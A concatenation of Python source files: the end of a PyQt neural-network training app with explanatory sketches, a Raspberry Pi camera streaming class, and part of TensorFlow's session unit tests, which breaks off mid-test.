print(self.train_images) print() print(self.train_labels) print('----------------------------------------------------') def load_test_array(self): self.test_image = cv2.cvtColor(cv2.imread(self.line_folder.text() + 'test/' + str(self.spin_test_array_id.value() - 1) + '.bmp'), cv2.COLOR_BGR2GRAY) self.ocl_test_array.setPixmap(QPixmap.fromImage(qimage2ndarray.array2qimage( cv2.cvtColor(cv2.resize(self.test_image, (256, 256)), cv2.COLOR_GRAY2RGB)))) def predict_test_image(self): # noinspection PyBroadException try: x = random.randrange(0, 32) y = random.randrange(0, 32) temp_image = self.test_image[y * 16: y * 16 + 16, x * 16: x * 16 + 16] self.ocl_test_image.setPixmap(QPixmap.fromImage(qimage2ndarray.array2qimage( cv2.cvtColor(cv2.resize(temp_image, (128, 128), interpolation=cv2.INTER_NEAREST), cv2.COLOR_GRAY2RGB)))) self.test_array = np.array([(temp_image / 255.0).flatten()]) self.test_labels = np.array([[self.spin_test_array_id.value() - 1]]) output_l0 = self.test_array output_l1 = dot_0_layer(output_l0, self.synaptic_weights_0) output_l2 = sigmoid(np.dot(output_l1, self.synaptic_weights_1.T)) if np.argmax(output_l2[0]) == self.test_labels[0][0]: self.label_predicted.setText(str(int(np.argmax(output_l2[0]) + 1)) + ' YEAH') else: self.label_predicted.setText(str(int(np.argmax(output_l2[0]) + 1)) + ' NOPE') self.progressBar_2.setValue(output_l2[0][0] * 100) self.progressBar_3.setValue(output_l2[0][1] * 100) self.progressBar_4.setValue(output_l2[0][2] * 100) self.progressBar_5.setValue(output_l2[0][3] * 100) except: print(sys.exc_info()) def save_to_file(self): compressed_data = [self.synaptic_weights_0, self.synaptic_weights_1] with open(self.line_folder.text() + 'model.txt', 'wb') as filehandle: pickle.dump(compressed_data, filehandle) def load_from_file(self): with open(self.line_folder.text() + 'model.txt', 'rb') as filehandle: compressed_data = pickle.load(filehandle) self.synaptic_weights_0 = np.array(compressed_data[0]) self.synaptic_weights_1 = np.array(compressed_data[1]) print('-------------------- WEIGHTS --------------------') print('Shape of synaptic_weights_0: ' + str(self.synaptic_weights_0.shape)) print('Shape of synaptic_weights_1: ' + str(self.synaptic_weights_1.shape)) print('Arrays:') print(self.synaptic_weights_0) print() print(self.synaptic_weights_1) print('-------------------------------------------------') def load_train_array(self): random.seed = 1 np.random.seed(1) self.load_train_data(True, self.line_folder.text()) # Synaptic weights arrays self.synaptic_weights_0 = [] for i in range(512): string_array = [int(random.randrange(-1, 2)) for _ in range(3)] + [0 for _ in range(253)] random.shuffle(string_array) self.synaptic_weights_0.append(string_array) self.synaptic_weights_0 = np.array(self.synaptic_weights_0) self.synaptic_weights_1 = np.array(2 * np.random.random((4, 512)) - 1) # TEST VALUES if self.test_values: self.synaptic_weights_0 = [] for i in range(16): string_array = [int(random.randrange(-1, 2)) for _ in range(3)] + [0 for _ in range(5)] random.shuffle(string_array) self.synaptic_weights_0.append(string_array) self.synaptic_weights_0 = np.array(self.synaptic_weights_0) self.synaptic_weights_1 = np.array(2 * np.random.random((4, 16)) - 1) if True: print('-------------------- WEIGHTS --------------------') print('Shape of synaptic_weights_0: ' + str(self.synaptic_weights_0.shape)) print('Shape of synaptic_weights_1: ' + str(self.synaptic_weights_1.shape)) print('Arrays:') print(self.synaptic_weights_0) print() print(self.synaptic_weights_1) 
print('-------------------------------------------------') def start_training(self): thread = threading.Thread(target=self.training) thread.start() def training(self): # noinspection PyBroadException try: i = 0 while i < int(self.spin_iterations.value()): output_l0 = self.train_images output_l1 = dot_0_layer(output_l0, self.synaptic_weights_0) output_l2 = sigmoid(np.dot(output_l1, self.synaptic_weights_1.T)) # Layer 2 error calculations error_l2 = [] for k in range(len(output_l2)): a = [] for m in range(4): if m == self.train_labels[0][k]: a.append(1 - output_l2[k][m]) else: a.append(0 - output_l2[k][m]) error_l2.append(a) error_l2 = np.array(error_l2) adjustments_l2 = output_l1.T.dot(error_l2 * (output_l2 * (1 - output_l2))) self.synaptic_weights_1 += adjustments_l2.T # Occuracy calculations predicted = [] occuracy = 0 for k in range(len(output_l2)): predicted.append(np.argmax(output_l2[k])) if np.argmax(output_l2[k]) == self.train_labels[0][k]: occuracy += 1 occuracy /= len(output_l2) predicted = np.array(predicted) if i % 1 == 0: print('-------------------- I: ' + str(i) + ' --------------------') # print('output_l2: ' + str(output_l2)) # print('error_l2: ' + str(error_l2)) print('predicted: ' + str(predicted)) print('occuracy: ' + str(occuracy)) # print('adjustments_l2: ' + str(adjustments_l2)) # print('----------------------------------------------') i += 1 self.progressBar.setValue(valmap(i, 0, self.spin_iterations.value(), 0, 100)) self.progressBar.setValue(0) except: print(sys.exc_info()) if __name__ == '__main__': app = QtWidgets.QApplication(sys.argv) app.setStyle("Fusion") """ dark_palette = QPalette() WHITE = QColor(255, 255, 255) BLACK = QColor(0, 0, 0) RED = QColor(255, 0, 0) PRIMARY = QColor(53, 53, 53) SECONDARY = QColor(25, 25, 25) LIGHT_PRIMARY = QColor(100, 100, 100) TERTIARY = QColor(42, 130, 218) dark_palette.setColor(QPalette.Window, PRIMARY) dark_palette.setColor(QPalette.WindowText, WHITE) dark_palette.setColor(QPalette.Base, SECONDARY) dark_palette.setColor(QPalette.AlternateBase, PRIMARY) dark_palette.setColor(QPalette.ToolTipBase, WHITE) dark_palette.setColor(QPalette.ToolTipText, WHITE) dark_palette.setColor(QPalette.Text, WHITE) dark_palette.setColor(QPalette.Button, LIGHT_PRIMARY) dark_palette.setColor(QPalette.ButtonText, WHITE) dark_palette.setColor(QPalette.BrightText, RED) dark_palette.setColor(QPalette.Link, TERTIARY) dark_palette.setColor(QPalette.Highlight, TERTIARY) dark_palette.setColor(QPalette.HighlightedText, BLACK) app.setPalette(dark_palette) app.setStyleSheet("QToolTip { color: #ffffff; background-color: #2a82da; border: 1px solid white; }") """ window = CollectorApp() window.show() app.exec_()
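The update in training() above is the classic delta rule: the output layer's error is scaled by the sigmoid derivative output * (1 - output) and accumulated through the previous layer's activations. Stripped of the GUI and the custom first layer, the same update on a toy problem looks like this — a sketch with made-up data, keeping the (classes, features) weight layout used above:

import numpy as np

rng = np.random.default_rng(1)


def sigmoid(x):
    return 1 / (1 + np.exp(-x))


features, classes, samples = 8, 4, 50
inputs = rng.random((samples, features))
labels = rng.integers(0, classes, samples)
targets = np.eye(classes)[labels]  # one-hot targets, like error_l2's construction

# Weights stored as (classes, features), matching synaptic_weights_1 above.
weights = 2 * rng.random((classes, features)) - 1

for step in range(200):
    output = sigmoid(inputs @ weights.T)   # forward pass
    error = targets - output               # same error term as error_l2
    # Delta rule: error scaled by the sigmoid derivative, backed through inputs.
    weights += (inputs.T @ (error * output * (1 - output))).T

accuracy = np.mean(output.argmax(axis=1) == labels)
print(f"training accuracy: {accuracy:.2f}")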
PiVideoStream.py
# import the necessary packages
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread


class PiVideoStream:
    def __init__(self, resolution=(1296, 976), framerate=32):
        # initialize the camera and stream
        self.camera = PiCamera()
        self.camera.resolution = resolution
        self.camera.framerate = framerate
        self.rawCapture = PiRGBArray(self.camera, size=resolution)
        self.stream = self.camera.capture_continuous(self.rawCapture,
            format="bgr", use_video_port=True)

        # initialize the frame and the variable used to indicate
        # if the thread should be stopped
        self.frame = None
        self.stopped = False

    def start(self):
        # start the thread to read frames from the video stream
        Thread(target=self.update, args=()).start()
        return self

    def update(self):
        # keep looping infinitely until the thread is stopped
        for f in self.stream:
            # grab the frame from the stream and clear the stream in
            # preparation for the next frame
            self.frame = f.array
            self.rawCapture.truncate(0)

            # if the thread indicator variable is set, stop the thread
            # and release camera resources
            if self.stopped:
                self.stream.close()
                self.rawCapture.close()
                self.camera.close()
                return

    def read(self):
        # return the frame most recently read
        return self.frame

    def stop(self):
        # indicate that the thread should be stopped
        self.stopped = True
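PiVideoStream is the standard threaded frame-grabber: the camera is drained on a background thread so read() always returns the latest frame without blocking the caller. The same pattern, sketched against cv2.VideoCapture for machines without a Pi camera — assumes opencv-python is installed, and is a sketch rather than a drop-in replacement:

import threading

import cv2


class WebcamVideoStream:
    """Threaded grabber mirroring PiVideoStream, built on cv2.VideoCapture."""

    def __init__(self, src=0):
        self.capture = cv2.VideoCapture(src)
        self.grabbed, self.frame = self.capture.read()
        self.stopped = False

    def start(self):
        # daemon thread keeps reading so read() never blocks the caller
        threading.Thread(target=self.update, daemon=True).start()
        return self

    def update(self):
        while not self.stopped:
            self.grabbed, self.frame = self.capture.read()
        self.capture.release()

    def read(self):
        # return the frame most recently read
        return self.frame

    def stop(self):
        # indicate that the thread should be stopped
        self.stopped = True


if __name__ == "__main__":
    stream = WebcamVideoStream(0).start()
    frame = stream.read()  # may be None if no camera is attached
    stream.stop()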
session_test.py
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for tensorflow.python.client.session.Session.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import random import os import sys import threading import time import warnings import numpy as np import six from six.moves import xrange # pylint: disable=redefined-builtin from tensorflow.core.framework import attr_value_pb2 from tensorflow.core.lib.core import error_codes_pb2 from tensorflow.core.protobuf import config_pb2 from tensorflow.python.client import session from tensorflow.python.eager import context from tensorflow.python.framework import common_shapes from tensorflow.python.framework import config from tensorflow.python.framework import constant_op from tensorflow.python.framework import device as framework_device_lib from tensorflow.python.framework import dtypes from tensorflow.python.framework import errors from tensorflow.python.framework import function from tensorflow.python.framework import importer from tensorflow.python.framework import ops from tensorflow.python.framework import sparse_tensor from tensorflow.python.framework import tensor_util from tensorflow.python.framework import test_util from tensorflow.python.framework import versions from tensorflow.python.ops import array_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import data_flow_ops from tensorflow.python.ops import gen_control_flow_ops # Import gradients to resolve circular imports from tensorflow.python.ops import gradients # pylint: disable=unused-import from tensorflow.python.ops import gradients_impl from tensorflow.python.ops import math_ops # Import resource_variable_ops for the variables-to-tensor implicit conversion. from tensorflow.python.ops import resource_variable_ops # pylint: disable=unused-import from tensorflow.python.ops import state_ops from tensorflow.python.ops import variables from tensorflow.python.platform import googletest from tensorflow.python.training import server_lib from tensorflow.python.util import compat try: import attr # pylint:disable=g-import-not-at-top except ImportError: attr = None # NOTE(mrry): Dummy shape registration for ops used in the tests, since they # don't have C++ op registrations on which to attach C++ shape fns. 
ops.RegisterShape('ConstructionFails')(common_shapes.unknown_shape) class SessionTest(test_util.TensorFlowTestCase): def setUp(self): super(SessionTest, self).setUp() warnings.simplefilter('always') def testUseExistingGraph(self): with ops.Graph().as_default() as g, ops.device('/cpu:0'): a = constant_op.constant(6.0, shape=[1, 1]) b = constant_op.constant(7.0, shape=[1, 1]) c = math_ops.matmul(a, b, name='matmul') with session.Session(graph=g): result = c.eval() self.assertAllEqual(result, [[42.0]]) def testUseDefaultGraph(self): with ops.Graph().as_default(), ops.device('/cpu:0'): a = constant_op.constant(6.0, shape=[1, 1]) b = constant_op.constant(7.0, shape=[1, 1]) c = math_ops.matmul(a, b, name='matmul') with session.Session(): result = c.eval() self.assertAllEqual(result, [[42.0]]) def testCreate(self): with session.Session(): inp = constant_op.constant(10.0, shape=[2, 3], name='W1') copy = array_ops.identity(inp) # Test with feed. # TODO(mrry): Investigate why order='F' didn't work. arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C') copy_val = copy.eval({'W1:0': arr}) self.assertAllEqual(arr, copy_val) # Test without feed. copy_val = copy.eval() self.assertAllEqual( np.asarray( [[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]], dtype=np.float32), copy_val) def testManyCPUs(self): with session.Session( config=config_pb2.ConfigProto(device_count={ 'CPU': 2, 'GPU': 0 })) as sess: inp = constant_op.constant(10.0, name='W1') self.assertAllEqual(inp.eval(), 10.0) num_cpu_devices = 0 num_gpu_devices = 0 for device in sess.list_devices(): device_type = framework_device_lib.DeviceSpec.from_string( device.name).device_type if device_type == 'CPU': num_cpu_devices += 1 elif device_type == 'GPU': num_gpu_devices += 1 self.assertEqual(2, num_cpu_devices) self.assertEqual(0, num_gpu_devices) def testPerSessionThreads(self): with session.Session( config=config_pb2.ConfigProto(use_per_session_threads=True)): inp = constant_op.constant(10.0, name='W1') self.assertAllEqual(inp.eval(), 10.0) def testSessionInterOpThreadPool(self): config_pb = config_pb2.ConfigProto() pool = config_pb.session_inter_op_thread_pool.add() with session.Session(config=config_pb) as s: inp = constant_op.constant(10.0, name='W1') results = s.run([inp]) self.assertAllEqual([10.0], results) pool = config_pb.session_inter_op_thread_pool.add() pool.num_threads = 1 with session.Session(config=config_pb) as s: inp = constant_op.constant(20.0, name='W2') results = s.run([inp]) self.assertAllEqual([20.0], results) pool = config_pb.session_inter_op_thread_pool.add() pool.num_threads = 1 pool.global_name = 't1' run_options = config_pb2.RunOptions() run_options.inter_op_thread_pool = ( len(config_pb.session_inter_op_thread_pool) - 1) with session.Session(config=config_pb) as s: inp = constant_op.constant(30.0, name='W2') results = s.run([inp], options=run_options) self.assertAllEqual([30.0], results) def testErrorsReported(self): with session.Session() as s: constant_op.constant(10.0, name='W1') with self.assertRaises(ValueError): s.run('foo:0') def testErrorPayload(self): with session.Session(): a = array_ops.placeholder(dtypes.float32) with self.assertRaisesOpError(lambda e: e.op == a.op): a.eval() def testErrorCodeWithNoNodeDef(self): with session.Session() as s: a = array_ops.placeholder(dtypes.float32, shape=[]) b = array_ops.placeholder(dtypes.float32, shape=[]) r1 = math_ops.add(a, b) def exc_predicate(e): return (e.op is None and e.node_def is None and e.error_code == error_codes_pb2.INVALID_ARGUMENT) with 
self.assertRaisesOpError(exc_predicate): # Run with a bogus handle. s.partial_run('foo', r1, feed_dict={a: 1, b: 2}) def testErrorBasedOn(self): with session.Session() as sess: a = constant_op.constant(0.0, shape=[2, 3]) # NOTE(mrry): The original_op is nonsense, but used here to test that the # errors are reported correctly. with sess.graph._original_op(a.op): b = array_ops.identity(a, name='id') with sess.graph._original_op(b.op): c = array_ops.placeholder(dtypes.float32) def exc_predicate(e): return (e.op == c.op and e.op._original_op == b.op and e.op._original_op._original_op == a.op) with self.assertRaisesOpError(exc_predicate): c.eval() def testFetchNone(self): with session.Session() as s: a = constant_op.constant(1.0) with self.assertRaises(TypeError): s.run(None) with self.assertRaises(TypeError): s.run([None]) with self.assertRaises(TypeError): s.run({'b': None}) with self.assertRaises(TypeError): s.run({'a': a, 'b': None}) def testFetchSingleton(self): with session.Session() as sess: a = constant_op.constant(42.0) res = sess.run(a) self.assertEqual(42.0, res) res = sess.run(a.op) # An op, not a tensor. self.assertEqual(None, res) tensor_runner = sess.make_callable(a) res = tensor_runner() self.assertEqual(42.0, res) op_runner = sess.make_callable(a.op) res = op_runner() self.assertEqual(None, res) def testFetchSingletonByName(self): with session.Session() as sess: a = constant_op.constant(42.0) res = sess.run(a.name) self.assertEqual(42.0, res) res = sess.run(a.op) # An op, not a tensor. self.assertEqual(None, res) def testFetchList(self): with session.Session() as sess: a = constant_op.constant(42.0) b = control_flow_ops.no_op() # An op, not a tensor. c = constant_op.constant(44.0) v = variables.Variable([54.0]) assign = v.assign([63.0]) res = sess.run([a, b, c, a.name, assign.op]) self.assertTrue(isinstance(res, list)) self.assertEqual([42.0, None, 44.0, 42.0, None], res) list_runner = sess.make_callable([a, b, c, a.name, assign.op]) res = list_runner() self.assertTrue(isinstance(res, list)) self.assertEqual([42.0, None, 44.0, 42.0, None], res) def testFetchTuple(self): with session.Session() as sess: a = constant_op.constant(42.0) b = control_flow_ops.no_op() # An op, not a tensor. c = constant_op.constant(44.0) res = sess.run((a, b, c, a.name)) self.assertTrue(isinstance(res, tuple)) self.assertEqual((42.0, None, 44.0, 42.0), res) tuple_runner = sess.make_callable((a, b, c, a.name)) res = tuple_runner() self.assertTrue(isinstance(res, tuple)) self.assertEqual((42.0, None, 44.0, 42.0), res) def testFetchNamedTuple(self): # pylint: disable=invalid-name ABC = collections.namedtuple('ABC', ['a', 'b', 'c']) # pylint: enable=invalid-name with session.Session() as sess: a = constant_op.constant(42.0) b = control_flow_ops.no_op() # An op, not a tensor. c = constant_op.constant(44.0) res = sess.run(ABC(a, b, c)) self.assertTrue(isinstance(res, ABC)) self.assertEqual(42.0, res.a) self.assertEqual(None, res.b) self.assertEqual(44.0, res.c) namedtuple_runner = sess.make_callable(ABC(a, b, c)) res = namedtuple_runner() self.assertTrue(isinstance(res, ABC)) self.assertEqual(42.0, res.a) self.assertEqual(None, res.b) self.assertEqual(44.0, res.c) def testFetchDict(self): with session.Session() as sess: a = constant_op.constant(42.0) b = control_flow_ops.no_op() # An op, not a tensor. 
c = constant_op.constant(44.0) res = sess.run({'a': a, 'b': b, 'c': c}) self.assertTrue(isinstance(res, dict)) self.assertEqual(42.0, res['a']) self.assertEqual(None, res['b']) self.assertEqual(44.0, res['c']) def testFetchOrderedDict(self): with session.Session() as sess: a = constant_op.constant(42.0) b = control_flow_ops.no_op() # An op, not a tensor. c = constant_op.constant(44.0) res = sess.run(collections.OrderedDict([(3, a), (2, b), (1, c)])) self.assertTrue(isinstance(res, collections.OrderedDict)) self.assertEqual([3, 2, 1], list(res.keys())) self.assertEqual(42.0, res[3]) self.assertEqual(None, res[2]) self.assertEqual(44.0, res[1]) @test_util.run_v1_only('b/120545219') def testFetchAttrs(self): if attr is None: self.skipTest('attr module is unavailable.') @attr.s class SampleAttr(object): field1 = attr.ib() field2 = attr.ib() val1 = np.array([1.2, 3.4, 5.6]) val2 = np.array([[1, 2], [4, 3]]) val3 = np.array([10, 20, 30]) t1 = constant_op.constant(val1) t2 = constant_op.constant(val2) sample = SampleAttr(t1, t2) with session.Session() as sess: result = sess.run(sample) self.assertIsInstance(result, SampleAttr) self.assertAllEqual(val1, result.field1) self.assertAllEqual(val2, result.field2) result = sess.run(sample, feed_dict={sample.field1: val3}) self.assertIsInstance(result, SampleAttr) self.assertAllEqual(val3, result.field1) self.assertAllEqual(val2, result.field2) @test_util.run_v1_only('b/120545219') def testFetchNestedAttrs(self): if attr is None: self.skipTest('attr module is unavailable.') @attr.s class SampleAttr(object): field0 = attr.ib() field1 = attr.ib() v1 = 10 v2 = 20 v3 = np.float32(1.2) v4 = np.float32(3.4) v5 = np.float64(100.001) v6 = np.float64(-23.451) arr1 = np.array([1.2, 6.7, 3.4]) arr2 = np.array([7, 11, 3]) sample = SampleAttr( SampleAttr( SampleAttr(constant_op.constant(v1), constant_op.constant(v2)), SampleAttr(constant_op.constant(arr1), constant_op.constant(arr2))), {'A': SampleAttr(constant_op.constant(v3), constant_op.constant(v4)), 'B': [SampleAttr(constant_op.constant(v5), constant_op.constant(v6))]}) with session.Session() as sess: result = sess.run(sample) self.assertIsInstance(result, SampleAttr) self.assertIsInstance(result.field0, SampleAttr) self.assertIsInstance(result.field0.field0, SampleAttr) self.assertIsInstance(result.field0.field1, SampleAttr) self.assertIsInstance(result.field0.field1.field0, np.ndarray) self.assertAllEqual(arr1, result.field0.field1.field0) self.assertIsInstance(result.field0.field1.field1, np.ndarray) self.assertAllEqual(arr2, result.field0.field1.field1) self.assertIsInstance(result.field1, dict) self.assertIn('A', result.field1) self.assertIn('B', result.field1) self.assertIsInstance(result.field1['A'], SampleAttr) self.assertAllEqual( [v3, v4], [result.field1['A'].field0, result.field1['A'].field1]) self.assertIsInstance(result.field1['B'], list) self.assertEqual(1, len(result.field1['B'])) self.assertIsInstance(result.field1['B'][0], SampleAttr) self.assertAllEqual( [v5, v6], [result.field1['B'][0].field0, result.field1['B'][0].field1]) def testFetchNestingEmptyOneLevel(self): with session.Session() as sess: a_val = 11.0 a = constant_op.constant(a_val) res = sess.run([[], tuple(), {}]) self.assertTrue(isinstance(res, list)) self.assertEquals(3, len(res)) self.assertTrue(isinstance(res[0], list)) self.assertEqual(0, len(res[0])) self.assertTrue(isinstance(res[1], tuple)) self.assertEqual(0, len(res[1])) self.assertTrue(isinstance(res[2], dict)) self.assertEqual(0, len(res[2])) res = sess.run([[], tuple(), 
{}, a]) self.assertTrue(isinstance(res, list)) self.assertEquals(4, len(res)) self.assertTrue(isinstance(res[0], list)) self.assertEqual(0, len(res[0])) self.assertTrue(isinstance(res[1], tuple)) self.assertEqual(0, len(res[1])) self.assertTrue(isinstance(res[2], dict)) self.assertEqual(0, len(res[2])) self.assertEqual(a_val, res[3]) def testFetchNestingOneLevel(self): with session.Session() as sess: # pylint: disable=invalid-name ABC = collections.namedtuple('ABC', ['a', 'b', 'c']) DEFG = collections.namedtuple('DEFG', ['d', 'e', 'f', 'g']) # pylint: enable=invalid-name a_val = 42.0 b_val = None c_val = 44.0 a = constant_op.constant(a_val) b = control_flow_ops.no_op() # An op, not a tensor. c = constant_op.constant(c_val) # List of lists, tuples, namedtuple, and dict res = sess.run([[a, b, c], (a, b, c), ABC(a=a, b=b, c=c), { 'a': a.name, 'c': c, 'b': b }]) self.assertTrue(isinstance(res, list)) self.assertEqual(4, len(res)) self.assertTrue(isinstance(res[0], list)) self.assertEqual(3, len(res[0])) self.assertEqual(a_val, res[0][0]) self.assertEqual(b_val, res[0][1]) self.assertEqual(c_val, res[0][2]) self.assertTrue(isinstance(res[1], tuple)) self.assertEqual(3, len(res[1])) self.assertEqual(a_val, res[1][0]) self.assertEqual(b_val, res[1][1]) self.assertEqual(c_val, res[1][2]) self.assertTrue(isinstance(res[2], ABC)) self.assertEqual(a_val, res[2].a) self.assertEqual(b_val, res[2].b) self.assertEqual(c_val, res[2].c) self.assertTrue(isinstance(res[3], dict)) self.assertEqual(3, len(res[3])) self.assertEqual(a_val, res[3]['a']) self.assertEqual(b_val, res[3]['b']) self.assertEqual(c_val, res[3]['c']) # Tuple of lists, tuples, namedtuple, and dict res = sess.run(([a, b, c], (a.name, b, c), ABC(a=a, b=b, c=c), { 'a': a, 'c': c, 'b': b })) self.assertTrue(isinstance(res, tuple)) self.assertEqual(4, len(res)) self.assertTrue(isinstance(res[0], list)) self.assertEqual(3, len(res[0])) self.assertEqual(a_val, res[0][0]) self.assertEqual(b_val, res[0][1]) self.assertEqual(c_val, res[0][2]) self.assertTrue(isinstance(res[1], tuple)) self.assertEqual(3, len(res[1])) self.assertEqual(a_val, res[1][0]) self.assertEqual(b_val, res[1][1]) self.assertEqual(c_val, res[1][2]) self.assertTrue(isinstance(res[2], ABC)) self.assertEqual(a_val, res[2].a) self.assertEqual(b_val, res[2].b) self.assertEqual(c_val, res[2].c) self.assertTrue(isinstance(res[3], dict)) self.assertEqual(3, len(res[3])) self.assertEqual(a_val, res[3]['a']) self.assertEqual(b_val, res[3]['b']) self.assertEqual(c_val, res[3]['c']) # Namedtuple of lists, tuples, namedtuples, and dict res = sess.run( DEFG( d=[a, b, c], e=(a, b, c), f=ABC(a=a.name, b=b, c=c), g={ 'a': a, 'c': c, 'b': b })) self.assertTrue(isinstance(res, DEFG)) self.assertTrue(isinstance(res.d, list)) self.assertEqual(3, len(res.d)) self.assertEqual(a_val, res.d[0]) self.assertEqual(b_val, res.d[1]) self.assertEqual(c_val, res.d[2]) self.assertTrue(isinstance(res.e, tuple)) self.assertEqual(3, len(res.e)) self.assertEqual(a_val, res.e[0]) self.assertEqual(b_val, res.e[1]) self.assertEqual(c_val, res.e[2]) self.assertTrue(isinstance(res.f, ABC)) self.assertEqual(a_val, res.f.a) self.assertEqual(b_val, res.f.b) self.assertEqual(c_val, res.f.c) self.assertTrue(isinstance(res.g, dict)) self.assertEqual(3, len(res.g)) self.assertEqual(a_val, res.g['a']) self.assertEqual(b_val, res.g['b']) self.assertEqual(c_val, res.g['c']) # Dict of lists, tuples, namedtuples, and dict res = sess.run({ 'd': [a, b, c], 'e': (a, b, c), 'f': ABC(a=a, b=b, c=c), 'g': { 'a': a.name, 'c': c, 'b': b 
} }) self.assertTrue(isinstance(res, dict)) self.assertEqual(4, len(res)) self.assertTrue(isinstance(res['d'], list)) self.assertEqual(3, len(res['d'])) self.assertEqual(a_val, res['d'][0]) self.assertEqual(b_val, res['d'][1]) self.assertEqual(c_val, res['d'][2]) self.assertTrue(isinstance(res['e'], tuple)) self.assertEqual(3, len(res['e'])) self.assertEqual(a_val, res['e'][0]) self.assertEqual(b_val, res['e'][1]) self.assertEqual(c_val, res['e'][2]) self.assertTrue(isinstance(res['f'], ABC)) self.assertEqual(a_val, res['f'].a) self.assertEqual(b_val, res['f'].b) self.assertEqual(c_val, res['f'].c) self.assertTrue(isinstance(res['g'], dict)) self.assertEqual(3, len(res['g'])) self.assertEqual(a_val, res['g']['a']) self.assertEqual(b_val, res['g']['b']) self.assertEqual(c_val, res['g']['c']) def testFetchTensorObject(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) results_with_list = s.run([c]) self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0]) results_with_single = s.run(c) self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single) results_with_get = c.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get) a_val, b_val = s.run([a, b]) # Test multiple fetches. self.assertAllEqual([[1.0, 1.0]], a_val) self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val) results_with_dict = s.run({'a': [a], 'b': b, 'z': [a, b]}) self.assertAllEqual([[1.0, 1.0]], results_with_dict['a'][0]) self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], results_with_dict['b']) self.assertAllEqual(results_with_dict['a'][0], results_with_dict['z'][0]) self.assertAllEqual(results_with_dict['b'], results_with_dict['z'][1]) # Test nested structures results_with_nested_list = s.run([[[a, b], b], a, [a, b]]) self.assertAllEqual([[1.0, 1.0]], results_with_nested_list[0][0][0]) self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], results_with_nested_list[0][0][1]) self.assertAllEqual(results_with_nested_list[0][0][0], results_with_nested_list[1]) self.assertAllEqual(results_with_nested_list[1], results_with_nested_list[2][0]) self.assertAllEqual(results_with_nested_list[0][0][1], results_with_nested_list[0][1]) self.assertAllEqual(results_with_nested_list[0][1], results_with_nested_list[2][1]) def testFetchScalar(self): with session.Session() as s: for scalar in np.int32, np.int64, np.float16, np.float32, np.float64: x = scalar(7) y = scalar(8) tf_x = constant_op.constant(x, shape=[]) tf_y = constant_op.constant(y) tf_xy = math_ops.add(tf_x, tf_y) # Single fetch xy = s.run(tf_xy) self.assertEqual(scalar, type(xy)) self.assertEqual(x + y, xy) # List fetch xy, = s.run([tf_xy]) self.assertEqual(scalar, type(xy)) self.assertEqual(x + y, xy) # Dict fetch xy = s.run({'xy': tf_xy})['xy'] self.assertEqual(scalar, type(xy)) self.assertEqual(x + y, xy) # Nested list fetch xy = s.run([[[tf_xy]], tf_xy, [tf_xy]]) self.assertAllEqual(xy, [[[x + y]], x + y, [x + y]]) self.assertEqual(scalar, type(xy[0][0][0])) self.assertEqual(scalar, type(xy[1])) self.assertEqual(scalar, type(xy[2][0])) def testFetchOperationObject(self): with session.Session() as s: a = constant_op.constant(1.0, shape=[1, 2]) v = variables.Variable(a, name='testFetchOperationObject_v') s.run(v.initializer) v_val = s.run(v) self.assertAllEqual([[1.0, 1.0]], v_val) def testFetchSparseTensor(self): with session.Session() as s: indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64) values = np.array([1.0, 2.0]).astype(np.float32) shape = 
np.array([7, 9, 2]).astype(np.int64) sp = sparse_tensor.SparseTensor( constant_op.constant(indices), constant_op.constant(values), constant_op.constant(shape)) # Single fetch, use as tuple sp_out = s.run(sp) indices_out, values_out, shape_out = sp_out self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Single fetch, use as SparseTensorValue sp_out = s.run(sp) self.assertAllEqual(sp_out.indices, indices) self.assertAllEqual(sp_out.values, values) self.assertAllEqual(sp_out.dense_shape, shape) # Tuple fetch, use as tuple indices_out, values_out, shape_out = s.run(sp) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # List fetch, use as tuple (indices_out, values_out, shape_out), = s.run([sp]) self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # List fetch, use as SparseTensorValue sp_out, = s.run([sp]) self.assertAllEqual(sp_out.indices, indices) self.assertAllEqual(sp_out.values, values) self.assertAllEqual(sp_out.dense_shape, shape) # Dict fetch (single value), use as tuple indices_out, values_out, shape_out = s.run({'sp': sp})['sp'] self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Dict fetch (list value), use as tuple (indices_out, values_out, shape_out), = s.run({'sp': [sp]})['sp'] self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Dict fetch, use as SparseTensorValue sp_out = s.run({'sp': sp})['sp'] self.assertAllEqual(sp_out.indices, indices) self.assertAllEqual(sp_out.values, values) self.assertAllEqual(sp_out.dense_shape, shape) # Nested list fetch use as tuple sp_out = s.run([[[sp]], sp]) indices_out, values_out, shape_out = sp_out[0][0][0] self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) indices_out, values_out, shape_out = sp_out[1] self.assertAllEqual(indices_out, indices) self.assertAllEqual(values_out, values) self.assertAllEqual(shape_out, shape) # Nested list fetch, use as SparseTensorValue sp_out = s.run([[[sp]], sp]) 